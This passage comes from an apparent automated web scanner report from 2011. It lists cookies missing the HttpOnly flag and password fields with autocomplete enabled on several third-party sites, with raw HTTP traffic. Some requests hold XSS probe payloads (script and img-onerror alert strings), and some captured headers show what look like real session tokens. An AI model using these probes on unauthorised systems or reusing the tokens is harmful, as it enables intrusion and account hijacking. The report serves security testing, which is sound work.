<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...

6.4. http://www.govinfosecurity.com/articles.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articles.php HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Set-Cookie: isPopUpDone=1; expires=Sun, 18-Sep-2011 11:11:23 GMT; domain=.govinfosecurity.com
Connection: close
Content-Type: text/html
Content-Length: 121213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

6.5. https://www.panopticsecurity.com/Comodo/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Comodo/index.jsp?partner=Comodo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://hackerguardian.com/hackerguardian/qa_sa_wizard.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.panopticsecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:23:21 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS
Connection: close
Content-Length: 590


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...

6.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

6.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c483ef1a943db8e1f27035ee8e5c

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 18 Sep 2011 11:28:59 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1 Java/Sun Microsystems Inc./1.6)
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Location: http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 224
Set-Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo">here</a>
...[SNIP]...

6.8. http://www.trustfax.com/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trustfax.com
Path:   /a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: www.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4

Response

HTTP/1.1 404 Not Found
Date: Sun, 18 Sep 2011 11:52:19 GMT
Server: Apache
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=798DFD1D548B6B5C106F73F5DF24E3F0.trustfax2a; Path=/trustfax-cms-public
Set-Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; Version=1; Domain=www.trustfax.com; Max-Age=31536000; Expires=Mon, 17-Sep-2012 11:52:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:52:19 GMT
X-TWA-Web: pb:28192
Content-Length: 0
Content-Type: text/html;charset=UTF-8


6.9. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 18 Sep 2011 12:19:27 GMT
Date: Sun, 18 Sep 2011 12:19:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

6.10. http://log.optimizely.com/event  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.optimizely.com
Path:   /event

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event?a=8018129&e=1&n=http%3A%2F%2Fwww.comodo.com%2F&u=oeu1315419552319r0.6822604623157531&y=false&x8022314=8017411&t=1316328651420 HTTP/1.1
Host: log.optimizely.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: external_5879383_end_user_id=oeu1314998032371r0.5426059009041637; external_8018129_end_user_id=oeu1315419552319r0.6822604623157531; external_5830034_end_user_id=oeu1316239542576r0.9213690920732915

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:45 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: nginx/0.8.54
Set-Cookie: external_8018129_bucket_map=8022314%3A8017411; expires=Wed, 15-Sep-2021 01:49:45 GMT
Content-Length: 35
Connection: keep-alive

GIF89a.............,...........D..;

6.11. http://server.iad.liveperson.net/hc/61298727/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5094376206423575644; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310598891

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

6.12. http://server.iad.liveperson.net/hc/61298727/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=knockPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328664526&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=717244329590173063; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310590892

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6096801432485254544; path=/hc/61298727
Set-Cookie: HumanClickACTIVE=1316310600121; expires=Mon, 19-Sep-2011 01:50:00 GMT; path=/
Content-Type: image/gif
Last-Modified: Sun, 18 Sep 2011 01:50:00 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

6.13. http://server.iad.liveperson.net/hc/61298727/x.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316296223985

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:49:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1316310592783; expires=Mon, 19-Sep-2011 01:49:52 GMT; path=/
Set-Cookie: HumanClickKEY=2402553747963169661; path=/hc/61298727
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 18 Sep 2011 01:49:52 GMT
Content-Length: 33363

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '61298727';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

6.14. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=749&url=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&pageUrl=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&time=1316366252200 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eae00085e7e2=1
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sun, 18 Sep 2011 12:16:27 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

6.15. http://www.seeos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:42 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=www4e75df0eb30884.96319108; expires=Mon, 19-Sep-2011 12:07:42 GMT
Vary: Accept-Encoding
Content-Length: 831
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=www4e75df0eb30884.96319108&src=&cat=travel&kw=Se
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 70 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://efaxcorporate.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.2. http://efaxcorporate.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.3. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
